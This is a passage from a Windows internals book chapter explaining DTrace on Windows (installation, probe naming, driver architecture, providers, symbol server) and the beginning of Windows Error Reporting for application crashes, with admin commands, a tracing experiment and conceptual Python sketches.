bcdedit /set dtrace ON
After the command succeeds, you can download the DTrace package from https://www.
microsoft.com/download/details.aspx?id=100441 and install it. Restart your computer (or virtual
machine) and open an administrative command prompt (by typing CMD in the Cortana search
box and selecting Run As Administrator). Type the following commands (replacing provid-
ers.txt with another file name if desired):
cd /d "C:\Program Files\DTrace"
dtrace -l > providers.txt
Open the generated file (providers.txt in the example). If DTrace has been successfully
installed and enabled, a list of probes and providers (DTrace, syscall, and ETW) should be listed in
the output file. Probes are composed of an ID and a human-readable name. The human-readable
name is composed of four parts. Each part may or may not exist, depending on the provider. In
general, providers try to follow the convention as closely as possible, but in some cases the meaning
of each part can be overloaded with something different:
- Provider  The name of the DTrace provider that is publishing the probe.
- Module  If the probe corresponds to a specific program location, the name of the module
in which the probe is located. The module is used only for the PID (which is not shown in the
output produced by the dtrace -l command) and ETW providers.
- Function  If the probe corresponds to a specific program location, the name of the
program function in which the probe is located.
- Name  The final component of the probe name is a name that gives you some idea of the
probe’s semantic meaning, such as BEGIN or END.
When writing out the full human-readable name of a probe, all the parts of the name are
separated by colons. For example,
syscall::NtQuerySystemInformation:entry
specifies a probe on the NtQuerySystemInformation function entry provided by the syscall provider.
Note that in this case, the module name is empty because the syscall provider does not specify
any name (all the syscalls are implicitly provided by the NT kernel).
The PID and FBT providers instead dynamically generate probes based on the process or
kernel image to which they are applied (and based on the currently available symbols). For ex-
ample, to correctly list the PID probes of a process, you should first get the process ID (PID) of the
process that you want to analyze (by simply opening the Task Manager and selecting the Details
property sheet; in this example, we are using Notepad, which in the test system has PID equal to
8020). Then execute DTrace with the following command:
dtrace -ln pid8020:::entry > pid_notepad.txt
This lists all the probes on function entries generated by the PID provider for the Notepad
process. The output will contain a lot of entries. Note that if you do not have the symbol store
path set, the output will not contain any probes generated by private functions. To restrict the
output, you can add the name of the module:
dtrace.exe -ln pid8020:kernelbase::entry >pid_kernelbase_notepad.txt
This yields all the PID probes generated for function entries of the kernelbase.dll module
mapped in Notepad. If you repeat the previous two commands after having set the symbol store
path with the following command,
set _NT_SYMBOL_PATH=srv*C:\symbols*http://msdl.microsoft.com/download/symbols
you will find that the output is much different (and also includes probes on private functions).
As explained in the “The Function Boundary Tracing (FBT) and Process (PID) providers” section
later in this chapter, the PID and FBT provider can be applied to any offset in a function’s code.
The following command returns all the offsets (always located at instruction boundary) in which
the PID provider can generate probes on the SetComputerNameW function of Kernelbase.dll:
dtrace.exe -ln pid8020:kernelbase:SetComputerNameW:
Internal architecture
As explained in the “Enabling DTrace and listing the installed providers” experiment earlier in this chap-
ter, in Windows 10 May 2020 Update (20H1), some components of DTrace should be installed through
an external package. Future versions of Windows may integrate DTrace completely in the OS image.
Even though DTrace is deeply integrated in the operating system, it requires three external compo-
nents to work properly. These include both the NT-specific implementation and the original DTrace
code released under the free Common Development and Distribution License (CDDL), which is down-
loadable from https://github.com/microsoft/DTrace-on-Windows/tree/windows.
As shown in Figure 10-37, DTrace in Windows is composed of the following components:
- DTrace.sys  The DTrace extension driver is the main component that executes the actions
associated with the probes and stores the results in a circular buffer that the user-mode
application obtains via IOCTLs.
- DTrace.dll  The module encapsulates LibDTrace, which is the DTrace user-mode engine.
It implements the compiler for the D scripts, sends the IOCTLs to the DTrace driver, and is the
main consumer of the circular DTrace buffer (where the DTrace driver stores the output of
the actions).
- DTrace.exe  The entry point executable that dispatches all the possible commands (specified
through the command line) to LibDTrace.
[Figure content: a .d script is the input to DTrace.exe, which calls into LibDTrace (DTrace.dll); LibDTrace uses Dbghelp.dll and a symbol store in user mode. In kernel mode, the DTrace.sys extension driver implements the FBT, PID, SYSCALL, and ETW providers and is loaded by Winload together with the NT kernel.]
FIGURE 10-37 DTrace internal architecture.
To start the dynamic trace of the Windows kernel, a driver, or a user-mode application, the user
just invokes the DTrace.exe main executable specifying a command or an external D script. In both
cases, the command or the file contain one or more probes and additional actions expressed in the D
programming language. DTrace.exe parses the input command line and forwards the proper request
to the LibDTrace (which is implemented in DTrace.dll). For example, when started for enabling one or
more probes, the DTrace executable calls the internal dtrace_program_fcompile function implemented
in LibDTrace, which compiles the D script and produces the DTrace Intermediate Format (DIF) bytecode
in an output buffer.
Note Describing the details of the DIF bytecode and how a D script (or D commands) is
compiled is outside the scope of this book. Interested readers can find detailed documenta-
tion in the OpenDTrace Specification book (released by the University of Cambridge), which
is available at https://www.cl.cam.ac.uk/techreports/UCAM-CL-TR-924.pdf.
While the D compiler is entirely implemented in user-mode in LibDTrace, to execute the compiled DIF
bytecode, the LibDTrace module just sends the DTRACEIOC_ENABLE IOCTL to the DTrace driver, which
implements the DIF virtual machine. The DIF virtual machine is able to evaluate each D clause expressed
in the bytecode and to execute optional actions associated with them. A limited set of actions are avail-
able, which are executed through native code and not interpreted via the D virtual machine.
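As a rough illustration of this split, the following Python sketch models a "compiler" that packages a clause as bytecode and a tiny virtual machine that evaluates the predicate before running the action. The instruction set, function names, and layout here are invented for illustration; the real DIF format and LibDTrace interfaces are far more elaborate.

```python
# Conceptual model of the user/kernel split described above: a "compiler"
# produces simple bytecode, and a tiny virtual machine evaluates each
# clause's predicate before running its action. Everything here is a
# stand-in; the real DIF instruction set differs.

def compile_clause(predicate, action):
    """User-mode side (LibDTrace role): package a clause as 'bytecode'."""
    return [("TEST", predicate), ("ACT", action)]

def dif_vm_run(bytecode, probe_context):
    """Kernel-mode side (DTrace.sys role): evaluate the compiled clause."""
    results = []
    it = iter(bytecode)
    for op, arg in it:
        if op == "TEST":
            if not arg(probe_context):   # predicate false: skip the clause
                next(it, None)           # consume the paired action
        elif op == "ACT":
            results.append(arg(probe_context))
    return results

prog = compile_clause(lambda ctx: ctx["pid"] == 4,
                      lambda ctx: f"probe fired in pid {ctx['pid']}")
print(dif_vm_run(prog, {"pid": 4}))   # clause matches, action runs
print(dif_vm_run(prog, {"pid": 7}))   # predicate filters it out
```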
As shown earlier in Figure 10-37, the DTrace extension driver implements all the providers. Before
discussing how the main providers work, it is necessary to present an introduction of the DTrace initial-
ization in the Windows OS.
DTrace initialization
The DTrace initialization starts in early boot stages, when the Windows loader is loading all the mod-
ules needed for the kernel to correctly start. One important part to load and validate is the API set file
(apisetschema.dll), which is a key component of the Windows system. (API Sets are described in Chapter
3 of part 1.) If the DTRACE_ENABLED BCD element is set in the boot entry (value 0x26000145, which
can be set through the dtrace readable name; see Chapter 12 for more details about BCD objects),
the Windows loader checks whether the dtrace.sys driver is present in the %SystemRoot%\System32\
Drivers path. If so, it builds a new API Set schema extension named ext-ms-win-ntos-trace-l1-1-0. The
schema targets the Dtrace.sys driver and is merged into the system API set schema (OslApiSetSchema).
Later in the boot process, when the NT kernel is starting its phase 1 of initialization, the TraceInitSystem
function is called to initialize the Dynamic Tracing subsystem. The API is imported in the NT kernel
through the ext-ms-win-ntos-trace-l1-1-0.dll API set schema. This implies that if DTrace is not enabled by
the Windows loader, the name resolution would fail, and the function would essentially be a no-op.
TraceInitSystem has the important duty of calculating the content of the trace callouts array,
which contains the functions that will be called by the NT kernel when a trace probe fires. The array is
stored in the KiDynamicTraceCallouts global symbol, which will be later protected by Patchguard to
prevent malicious drivers from illegally redirecting the flow of execution of system routines. Finally,
through the TraceInitSystem function, the NT kernel sends to the DTrace driver another important ar-
ray, which contains private system interfaces used by the DTrace driver to apply the probes. (The array
is exposed in a trace extension context data structure.) This kind of initialization, where both the DTrace
driver and the NT kernel exchange private interfaces, is the main motivation why the DTrace driver is
called an extension driver.
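The two-way exchange described above can be pictured with a small sketch. Python is used here purely as pseudocode for the handshake; all class and function names are invented, not actual kernel interfaces:

```python
# Conceptual sketch of the "extension" handshake described above: at
# initialization the kernel hands the extension a table of private system
# interfaces, and the extension hands back the callout functions the
# kernel will invoke when probes fire. All names are invented.
class Kernel:
    def __init__(self):
        self.trace_callouts = None           # KiDynamicTraceCallouts role

    def trace_init_system(self, extension):
        # Private interfaces exposed to the driver (NT system interfaces array)
        system_interfaces = {"set_service_callback":
                             lambda name: f"hooked {name}"}
        self.trace_callouts = extension.register(system_interfaces)

class DTraceDriver:
    def register(self, system_interfaces):
        self.sys = system_interfaces         # keep the kernel's interfaces
        # Return the callouts the kernel will call when a probe fires
        return {"fbt": lambda probe: f"fired {probe}"}

kernel, driver = Kernel(), DTraceDriver()
kernel.trace_init_system(driver)
print(kernel.trace_callouts["fbt"]("NtOpenFile:entry"))
print(driver.sys["set_service_callback"]("NtClose"))
```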
The Pnp manager later starts the DTrace driver, which is installed in the system as boot driver, and
calls its main entry point (DriverEntry). The routine registers the \Device\DTrace control device and its
symbolic link (\GLOBAL??\DTrace). It then initializes the internal DTrace state, creating the first DTrace
built-in provider. It finally registers all the available providers by calling the initialization function of
each of them. The initialization method depends on each provider and usually ends up calling the
internal dtrace_register function, which registers the provider with the DTrace framework. Another
common action in the provider initialization is to register a handler for the control device. User-mode
applications can communicate with DTrace and with a provider through the DTrace control device,
which exposes virtual files (handlers) to providers. For example, the user-mode LibDTrace communi-
cates directly with the PID provider by opening a handle to the \\.\DTrace\Fasttrap virtual file (handler).
The syscall provider
When the syscall provider gets activated, DTrace ends up calling the KeSetSystemServiceCallback
routine, with the goal of activating a callback for the system call specified in the probe. The routine is
exposed to the DTrace driver thanks to the NT system interfaces array. The latter is compiled by the
NT kernel at DTrace initialization time (see the previous section for more details) and encapsulated in
an extension context data structure internally called KiDynamicTraceContext. The first time that the
KeSetSystemServiceCallback is called, the routine has the important task of building the global service
trace table (KiSystemServiceTraceCallbackTable), which is an RB (red-black) tree containing descrip-
tors of all the available syscalls. Each descriptor includes a hash of the syscall’s name, its address, and
number of parameters and flags indicating whether the callback is enabled on entry or on exit. The NT
kernel includes a static list of syscalls exposed through the KiServicesTab internal array.
After the global service trace table has been filled, the KeSetSystemServiceCallback calculates the
hash of the syscall’s name specified by the probe and searches the hash in the RB tree. If there are
no matches, the probe has specified a wrong syscall name (so the function exits signaling an error).
Otherwise, the function modifies the enablement flags located in the found syscall’s descriptor and
increases the number of the enabled trace callbacks (which is stored in an internal variable).
When the first DTrace syscall callback is enabled, the NT kernel sets the syscall bit in the global
KiDynamicTraceMask bitmask. This is very important because it enables the system call handler
(KiSystemCall64) to invoke the global trace handlers. (System calls and system service dispatching have
been discussed extensively in Chapter 8.)
This design allows DTrace to coexist with the system call handling mechanism without having any
sort of performance penalty. If no DTrace syscall probe is active, the trace handlers are not invoked. A
trace handler can be called on entry and on exit of a system call. Its functionality is simple. It just scans
the global service trace table looking for the descriptor of the system call. When it finds the descrip-
tor, it checks whether the enablement flag is set and, if so, invokes the correct callout (contained in the
global dynamic trace callout array, KiDynamicTraceCallouts, as specified in the previous section). The
callout, which is implemented in the DTrace driver, uses the generic internal dtrace_probe function to
fire the syscall probe and execute the actions associated with it.
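The overall path, from enabling a probe by syscall-name hash to the handler firing the callout, can be modeled roughly as follows. The hash, the table, and the mask bit are simplified stand-ins for KiSystemServiceTraceCallbackTable, KiDynamicTraceMask, and KiDynamicTraceCallouts; this is a conceptual model, not kernel code:

```python
# Conceptual model of the syscall-tracing path described above.
SYSCALL_TRACE_BIT = 0x1
dynamic_trace_mask = 0            # no probes yet: handler stays on fast path
fired = []

def name_hash(name):              # stand-in for the syscall-name hash
    return sum(map(ord, name)) & 0xFFFF

# Global service trace table: one descriptor per syscall, keyed by name hash.
service_trace_table = {
    name_hash(n): {"name": n, "entry_enabled": False, "exit_enabled": False}
    for n in ("NtOpenFile", "NtClose")
}

def enable_probe(syscall_name):
    """KeSetSystemServiceCallback role: flip the descriptor's flag."""
    global dynamic_trace_mask
    desc = service_trace_table.get(name_hash(syscall_name))
    if desc is None:
        return False              # wrong syscall name: signal an error
    desc["entry_enabled"] = True
    dynamic_trace_mask |= SYSCALL_TRACE_BIT
    return True

def system_call_handler(syscall_name):
    """KiSystemCall64 role: invoke trace handlers only if the bit is set."""
    if dynamic_trace_mask & SYSCALL_TRACE_BIT:
        desc = service_trace_table.get(name_hash(syscall_name))
        if desc and desc["entry_enabled"]:
            fired.append(syscall_name)    # callout -> dtrace_probe
    # ... normal service dispatch continues here ...

system_call_handler("NtClose")            # no probe yet: nothing fires
assert enable_probe("NtClose") and not enable_probe("NtBogusCall")
system_call_handler("NtClose")
print(fired)                              # ['NtClose']
```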
The Function Boundary Tracing (FBT) and Process (PID) providers
Both the FBT and PID providers are similar because they allow a probe to be enabled on any function
entry and exit points (not necessarily a syscall). The target function can reside in the NT kernel or as
part of a driver (for these cases, the FBT provider is used), or it can reside in a user-mode module, which
should be executed by a process. (The PID provider can trace user-mode applications.) An FBT or PID
probe is activated in the system through breakpoint opcodes (INT 3 in x86, BRK in ARM64) that are
written directly in the target function’s code. This has the following important implications:
■  When a PID or FBT probe fires, DTrace should be able to re-execute the replaced instruction before calling back the target function. To do this, DTrace uses an instruction emulator, which, at the time of this writing, is compatible with the AMD64 and ARM64 architectures. The emulator is implemented in the NT kernel and is normally invoked by the system exception handler while dealing with a breakpoint exception.
■  DTrace needs a way to identify functions by name. The name of a function is never compiled in the final binary (except for exported functions). DTrace uses multiple techniques to achieve this, which will be discussed in the “DTrace type library” section later in this chapter.
■  A single function can exit (return) in multiple ways from different code branches. To identify the exit points, a function graph analyzer is required to disassemble the function’s instructions and find each exit point. Even though the original function graph analyzer was part of the Solaris code, the Windows implementation of DTrace uses a new optimized version of it, which still lives in the LibDTrace library (DTrace.dll). While user-mode functions are analyzed by the function graph analyzer, DTrace uses the PDATA v2 unwind information to reliably find kernel-mode function exit points (more information on function unwinds and exception dispatching is available in Chapter 8). If the kernel-mode module does not make use of PDATA v2 unwind information, the FBT provider will not create any probes on function returns for it.
DTrace installs FBT or PID probes by calling the KeSetTracepoint function of the NT kernel exposed
through the NT System interfaces array. The function validates the parameters (the callback pointer
in particular) and, for kernel targets, verifies that the target function is located in an executable code
section of a known kernel-mode module. Similar to the syscall provider, a KI_TRACEPOINT_ENTRY data
structure is built and used for keeping track of the activated trace points. The data structure contains
the owning process, access mode, and target function address. It is inserted in a global hash table,
KiTpHashTable, which is allocated the first time an FBT or PID probe gets activated. Finally, the single
instruction located in the target code is parsed (imported in the emulator) and replaced with a break-
point opcode. The trap bit in the global KiDynamicTraceMask bitmask is set.
For kernel-mode targets, the breakpoint replacement can happen only when VBS (Virtualization
Based Security) is enabled. The MmWriteSystemImageTracepoint routine locates the loader data table
entry associated with the target function and invokes the SECURESERVICE_SET_TRACEPOINT secure
call. The Secure Kernel is the only entity able to collaborate with HyperGuard and thus to render the
breakpoint application a legit code modification. As explained in Chapter 7 of Part 1, Kernel Patch
protection (also known as Patchguard) prevents any code modification from being performed on the
NT kernel and some essential kernel drivers. If VBS is not enabled on the system, and a debugger is not
attached, an error code is returned, and the probe application fails. If a kernel debugger is attached,
the breakpoint opcode is applied by the NT kernel through the MmDbgCopyMemory function.
(Patchguard is not enabled on debugged systems.)
When called for debugger exceptions, which may be caused by a DTrace FBT or PID probe firing,
the system exception handler (KiDispatchException) checks whether the “trap” bit is set in the global
KiDynamicTraceMask bitmask. If it is, the exception handler calls the KiTpHandleTrap function, which
searches the KiTpHashTable to determine whether the exception was caused by a registered
FBT or PID probe firing. For user-mode probes, the function checks whether the process context is
the expected one. If it is, or if the probe is a kernel-mode one, the function directly invokes the DTrace
callback, FbtpCallback, which executes the actions associated with the probe. When the callback
completes, the handler invokes the emulator, which emulates the original first instruction of the target
function before transferring the execution context to it.
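A minimal model of this install-and-trap cycle, with strings standing in for instructions and a dictionary standing in for KiTpHashTable, might look like this (purely illustrative; the real emulator decodes and re-executes machine instructions):

```python
# Simplified model of the FBT/PID flow described above: install a probe by
# saving the original "instruction" and writing a breakpoint, then handle
# the trap by firing the callback and emulating the saved instruction.
BREAKPOINT = "BRK"

code = ["push", "mov", "ret"]                # fake target function
tracepoints = {}                             # KiTpHashTable role
log = []

def set_tracepoint(addr, callback):
    """KeSetTracepoint role: remember the original, patch the breakpoint."""
    tracepoints[addr] = {"original": code[addr], "callback": callback}
    code[addr] = BREAKPOINT                  # the "legit code modification"

def dispatch_exception(addr):
    """KiTpHandleTrap role: is this breakpoint one of our probes?"""
    tp = tracepoints.get(addr)
    if tp is None:
        return "unhandled breakpoint"        # not ours: normal dispatch
    log.append(tp["callback"]())             # FbtpCallback: run the actions
    return f"emulate '{tp['original']}' then resume"   # emulator's job

set_tracepoint(0, lambda: "entry probe fired")
print(code[0])                               # BRK now sits in the code
print(dispatch_exception(0))
print(log)
```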
EXPERIMENT: Tracing dynamic memory
In this experiment, you dynamically trace the dynamic memory applied to a VM. Using Hyper-V
Manager, you need to create a generation 2 Virtual Machine and apply a minimum of 768 MB
and an unlimited maximum amount of dynamic memory (more information on dynamic memory
and Hyper-V is available in Chapter 9). The VM should have the May 2019 (19H1) or May 2020
(20H1) Update of Windows 10 or later installed as well as the DTrace package (which should be
enabled as explained in the “Enabling DTrace and listing the installed providers” experiment from
earlier in this chapter).
The dynamic_memory.d script, which can be found in this book’s downloadable resources,
needs to be copied in the DTrace directory and started by typing the following commands in an
administrative command prompt window:
cd /d "c:\Program Files\DTrace"
dtrace.exe -s dynamic_memory.d
With only the preceding commands, DTrace will refuse to compile the script because of an
error similar to the following:
dtrace: failed to compile script dynamic_memory.d: line 62: probe description fbt:nt:MiRem
ovePhysicalMemory:entry does not match any probes
This is because, in standard configurations, the path of the symbols store is not set. The script
attaches the FBT provider on two OS functions: MmAddPhysicalMemory, which is exported from
the NT kernel binary, and MiRemovePhysicalMemory, which is not exported or published in the
public WDK. For the latter, the FBT provider has no way to calculate its address in the system.
DTrace can obtain types and symbol information from different sources, as explained in the
“DTrace type library” section later in this chapter. To allow the FBT provider to correctly work with
internal OS functions, you should set the Symbol Store’s path to point to the Microsoft public
symbol server, using the following command:
set _NT_SYMBOL_PATH=srv*C:\symbols*http://msdl.microsoft.com/download/symbols
After the symbol store’s path is set, if you restart DTrace targeting the dynamic_memory.d
script, it should be able to correctly compile it and show the following output:
The Dynamic Memory script has begun.
Now you should simulate a high-memory pressure scenario. You can do this in multiple
ways—for example, by starting your favorite browser and opening a lot of tabs, by starting a 3D
game, or by simply using the TestLimit tool with the -d command switch, which forces the system
to contiguously allocate memory and write to it until all the resources are exhausted. The VM
worker process in the root partition should detect the scenario and inject new memory in the
child VM. This would be detected by DTrace:
Physical memory addition request intercepted. Start physical address 0x00112C00, Number of
pages: 0x00000400.
Addition of 1024 memory pages starting at PFN 0x00112C00 succeeded!
In a similar way, if you close all the applications in the guest VM and you recreate a high-
memory pressure scenario in your host system, the script would be able to intercept dynamic
memory’s removal requests:
Physical memory removal request intercepted. Start physical address 0x00132000, Number of
pages: 0x00000200.
Removal of 512 memory pages starting at PFN 0x00132000 succeeded!
After interrupting DTrace using Ctrl+C, the script prints out some statistics information:
Dynamic Memory script ended.
Numbers of Hot Additions: 217
Numbers of Hot Removals: 1602
Since starts the system has gained 0x00017A00 pages (378 MB).
If you open the dynamic_memory.d script using Notepad, you will find that it installs a total of
six probes (four FBT and two built-in) and performs logging and counting actions. For example,
fbt:nt:MmAddPhysicalMemory:return
/ self->pStartingAddress != 0 /
installs a probe on the exit points of the MmAddPhysicalMemory function only if the starting
physical address obtained at the function entry point is not 0. More information on the D programming language applied to DTrace is available in The illumos Dynamic Tracing Guide book,
which is freely accessible at http://dtrace.org/guide/preface.html.
The ETW provider
DTrace supports both an ETW provider, which allows probes to fire when certain ETW events are gen-
erated by particular providers, and the etw_trace action, which allows DTrace scripts to generate new
customized TraceLogging ETW events. The etw_trace action is implemented in LibDTrace, which uses
TraceLogging APIs to dynamically register a new ETW provider and generate events associated with it.
More information on ETW has been presented in the “Event Tracing for Windows (ETW)” section previ-
ously in this chapter.
The ETW provider is implemented in the DTrace driver. When the Trace engine is initialized by the
Pnp manager, it registers all providers with the DTrace engine. At registration time, the ETW provider
configures an ETW session called DTraceLoggingSession, which is set to write events in a circular buf-
fer. When DTrace is started from the command line, it sends an IOCTL to DTrace driver. The IOCTL
handler calls the provide function of each provider; the DtEtwpCreate internal function invokes the
NtTraceControl API with the EtwEnumTraceGuidList function code. This allows DTrace to enumerate all
the ETW providers registered in the system and to create a probe for each of them. (dtrace -l is also
able to display ETW probes.)
When a D script targeting the ETW provider is compiled and executed, the internal DtEtwEnable
routine gets called with the goal of enabling one or more ETW probes. The logging session configured
at registration time is started, if it’s not already running. Through the trace extension context (which,
as previously discussed, contains private system interfaces), DTrace is able to register a kernel-mode
callback called every time a new event is logged in the DTrace logging session. The first time that the
session is started, there are no providers associated with it. Similar to the syscall and FBT provider, for
each probe DTrace creates a tracking data structure and inserts it in a global RB tree (DtEtwpProbeTree)
representing all the enabled ETW probes. The tracking data structure is important because it rep-
resents the link between the ETW provider and the probes associated with it. DTrace calculates the
correct enablement level and keyword bitmask for the provider (see the “Provider Enablement” section
previously in this chapter for more details) and enables the provider in the session by invoking the
NtTraceControl API.
When an event is generated, the ETW subsystem calls the callback routine, which searches the
global ETW probe tree for the context data structure representing the probe. When found,
DTrace can fire the probe (still using the internal dtrace_probe function) and execute all the actions
associated with it.
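The level/keyword calculation mentioned above follows the usual ETW enablement semantics: the session must be enabled at a level high enough for every probe, with the requested keyword masks OR'ed together. A hedged sketch of that aggregation (illustrative code, not the DTrace implementation):

```python
# Sketch of the enablement calculation: when several ETW probes target the
# same provider, compute the level and keyword mask to pass when enabling
# the provider in the logging session.
def provider_enablement(probes):
    level = 0
    keywords = 0
    for p in probes:
        level = max(level, p["level"])       # higher level = more verbose
        keywords |= p["keywords"]            # union of requested keywords
    return level, keywords

probes = [
    {"level": 4, "keywords": 0x10},          # informational, keyword 0x10
    {"level": 2, "keywords": 0x01},          # error-level, keyword 0x01
]
print(provider_enablement(probes))           # (4, 0x11)
```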
DTrace type library
DTrace works with types. System administrators are able to inspect internal operating system data
structures and use them in D clauses to describe actions associated with probes. DTrace also supports
supplemental data types compared to the ones supported by the standard D programming language.
To be able to work with complex OS-dependent data types and allow the FBT and PID providers to set
probes on internal OS and application functions, DTrace obtains information from different sources:
■  Function names, signatures, and data types are initially extracted from information embedded in the executable binary (which adheres to the Portable Executable file format), like from the export table and debug information.
■  For the original DTrace project, the Solaris operating system included support for Compact C Type Format (CTF) in its executable binary files (which adhere to the Executable and Linkable Format - ELF). This allowed the OS to store the debug information needed by DTrace to run directly into its modules (the debug information can also be stored using the deflate compression format). The Windows version of DTrace still supports a partial CTF, which has been added as a resource section of the LibDTrace library (Dtrace.dll). CTF in the LibDTrace library stores the type information contained in the public WDK (Windows Driver Kit) and SDK (Software Development Kit) and allows DTrace to work with basic OS data types without requiring any symbol file.
■  Most of the private types and internal OS function signatures are obtained from PDB symbols. Public PDB symbols for the majority of the operating system’s modules are downloadable from the Microsoft Symbol Server. (These symbols are the same as those used by the Windows Debugger.) The symbols are deeply used by the FBT provider to correctly identify internal OS functions and by DTrace to be able to retrieve the correct type of parameters for each syscall and function.
The DTrace symbol server
DTrace includes an autonomous symbol server that can download PDB symbols from the Microsoft pub-
lic Symbol store and render them available to the DTrace subsystem. The symbol server is implemented
mainly in LibDTrace and can be queried by the DTrace driver using the Inverted call model. As part of the
providers’ registration, the DTrace driver registers a SymServer pseudo-provider. The latter is not a real
provider but just a shortcut that allows the symsrv handler for the DTrace control device to be registered.
When DTrace is started from the command line, the LibDTrace library starts the symbols server
by opening a handle to the \\.\dtrace\symsrv control device (using the standard CreateFile API). The
request is processed by the DTrace driver through the Symbol server IRP handler, which registers the
user-mode process, adding it in an internal list of symbols server processes. LibDTrace then starts a
new thread, which sends a dummy IOCTL to the DTrace symbol server device and waits indefinitely for
a reply from the driver. The driver marks the IRP as pending and completes it only when a provider (or
the DTrace subsystem), requires new symbols to be parsed.
Every time the driver completes the pending IRP, the DTrace symbols server thread wakes up and
uses services exposed by the Windows Image Helper library (Dbghelp.dll) to correctly download and
parse the required symbol. The driver then waits for a new dummy IOCTL to be sent from the symbols
thread. This time the new IOCTL will contain the results of the symbol parsing process. The user-mode
thread wakes up again only when the DTrace driver requires it.
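This inverted call model, where the user-mode thread blocks on a pending request and the "driver" wakes it only when work is needed, can be imitated with a pair of queues. This is a toy model: the real mechanism uses IOCTLs and pending IRPs, and the names here are invented.

```python
# Toy version of the inverted call model: the user-mode "symbol server"
# thread sends a request that the "driver" holds pending, and is woken
# only when the driver needs a symbol parsed.
import queue
import threading

pending_irp = queue.Queue()      # the IRP the driver completes when it needs work
results = queue.Queue()          # the next "dummy IOCTL" carries the answer

def symbol_server_thread():
    while True:
        request = pending_irp.get()          # wait indefinitely for the driver
        if request is None:
            break                            # shutdown signal
        # Dbghelp.dll role: download and parse the requested symbol (faked)
        results.put(f"parsed symbols for {request}")

worker = threading.Thread(target=symbol_server_thread)
worker.start()
pending_irp.put("ntoskrnl.pdb")  # driver needs symbols: complete the pending IRP
answer = results.get(timeout=5)
print(answer)
pending_irp.put(None)            # shut the worker down
worker.join()
```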
Windows Error Reporting (WER)
Windows Error Reporting (WER) is a sophisticated mechanism that automates the submission of both
user-mode process crashes as well as kernel-mode system crashes. Multiple system components have
been designed for supporting reports generated when a user-mode process, protected process, trust-
let, or the kernel crashes.
Windows 10, unlike its predecessors, does not include a graphical dialog box in which the
user can configure the details that Windows Error Reporting acquires and sends to Microsoft (or to
an internal server configured by the system administrator) when an application crashes. As shown in
Figure 10-38, in Windows 10, the Security and Maintenance applet of the Control Panel can show the
user a history of the reports generated by Windows Error Reporting when an application (or the kernel)
crashes. The applet can show also some basic information contained in the report.
FIGURE 10-38 The Reliability monitor of the Security and Maintenance applet of the Control Panel.
Windows Error Reporting is implemented in multiple components of the OS, mainly because it
needs to deal with different kinds of crashes:
■  The Windows Error Reporting Service (WerSvc.dll) is the main service that manages the creation and sending of reports when a user-mode process, protected process, or trustlet crashes.
■  The Windows Fault Reporting and Secure Fault Reporting (WerFault.exe and WerFaultSecure.exe) are mainly used to acquire a snapshot of the crashing application and start the generation and sending of a report to the Microsoft Online Crash Analysis site (or, if configured, to an internal error reporting server).
■  The actual generation and transmission of the report is performed by the Windows Error Reporting DLL (Wer.dll). The library includes all the functions used internally by the WER engine and also some exported APIs that applications can use to interact with Windows Error Reporting (documented at https://docs.microsoft.com/en-us/windows/win32/api/_wer/). Note that some WER APIs are also implemented in Kernelbase.dll and Faultrep.dll.
■  The Windows User Mode Crash Reporting DLL (Faultrep.dll) contains common WER stub code that is used by system modules (Kernel32.dll, the WER service, and so on) when a user-mode application crashes or hangs. It includes services for creating a crash signature, reporting a hang to the WER service, and managing the correct security context for the report creation and transmission (which includes creating the WerFault executable under the correct security token).
■  The Windows Error Reporting Dump Encoding Library (Werenc.dll) is used by the Secure Fault Reporting to encrypt the dump files generated when a trustlet crashes.
■  The Windows Error Reporting Kernel Driver (WerKernel.sys) is a kernel library that exports functions to capture a live kernel memory dump and submit the report to the Microsoft Online Crash Analysis site. Furthermore, the driver includes APIs for creating and submitting reports for user-mode faults from a kernel-mode driver.
Describing the entire architecture of WER is outside the scope of this book. In this section, we mainly
describe error reporting for user-mode applications and the NT kernel (or kernel-driver) crashes.
User applications crashes
As discussed in Chapter 3 of Part 1, all the user-mode threads in Windows start with the RtlUserThreadStart
function located in Ntdll. The function does nothing more than calling the real thread start routine
under a structured exception handler. (Structured exception handling is described in Chapter 8.)
The handler protecting the real start routine is internally called Unhandled Exception Handler
because it is the last one that can manage an exception happening in a user-mode thread (when the
thread does not already handle it). The handler, if executed, usually terminates the process with the
NtTerminateProcess API. The entity that decides whether to execute the handler is the unhandled
exception filter, RtlpThreadExceptionFilter. Noteworthy is that the unhandled exception filter and
handler are executed only under abnormal conditions; normally, applications should manage their
own exceptions with inner exception handlers.
When a Win32 process is starting, the Windows loader maps the needed imported libraries.
The kernelbase initialization routine installs its own unhandled exception filter for the process, the
UnhandledExceptionFilter routine. When a fatal unhandled exception happens in a process’s thread,
the filter is called to determine how to process the exception. The kernelbase unhandled exception
filter builds context information (such as the current value of the machine’s registers and stack, the
faulting process ID, and thread ID) and processes the exception:
■ If a debugger is attached to the process, the filter lets the exception happen (by returning CONTINUE_SEARCH). In this way, the debugger can break and see the exception.
■ If the process is a trustlet, the filter stops any processing and invokes the kernel to start the Secure Fault Reporting (WerFaultSecure.exe).
■ The filter calls the CRT unhandled exception routine (if it exists) and, in case the latter does not know how to handle the exception, it calls the internal WerpReportFault function, which connects to the WER service.
Before opening the ALPC connection, WerpReportFault should wake up the WER service and
prepare an inheritable shared memory section, where it stores all the context information previously
acquired. The WER service is a direct triggered-start service, which is started by the SCM only in case
the WER_SERVICE_START WNF state is updated or in case an event is written in a dummy WER activa-
tion ETW provider (named Microsoft-Windows-Feedback-Service-Triggerprovider). WerpReportFault
updates the corresponding WNF state and waits on the \KernelObjects\SystemErrorPortReady event, which is
signaled by the WER service to indicate that it is ready to accept new connections. After a connection
has been established, Ntdll connects to the WER service’s \WindowsErrorReportingServicePort ALPC
port, sends the WERSVC_REPORT_CRASH message, and waits indefinitely for its reply.
The message allows the WER service to begin to analyze the crashed program’s state and to perform
the appropriate actions to create a crash report. In most cases, this means launching the WerFault.exe
program. For user-mode crashes, the Windows Fault Reporting process is invoked two times using the
faulting process’s credentials. The first time is used to acquire a “snapshot” of the crashing process. This
feature was introduced in Windows 8.1 with the goal of rendering the crash report generation of UWP
applications (which, at that time, were all single-instance applications) faster. In that way, the user could
have restarted a crashed UWP application without waiting for the report being generated. (UWP and
the modern application stack are discussed in Chapter 8.)
Snapshot creation
WerFault maps the shared memory section containing the crash data and opens the faulting process
and thread. When invoked with the -pss command-line argument (used for requesting a process snap-
shot), it calls the PssNtCaptureSnapshot function exported by Ntdll. The latter uses native APIs to query
multiple pieces of information about the crashing process (like basic information, job information, process
times, secure mitigations, process file name, and shared user data section). Furthermore, the function
queries information regarding all the memory sections backed by a file and mapped in the entire
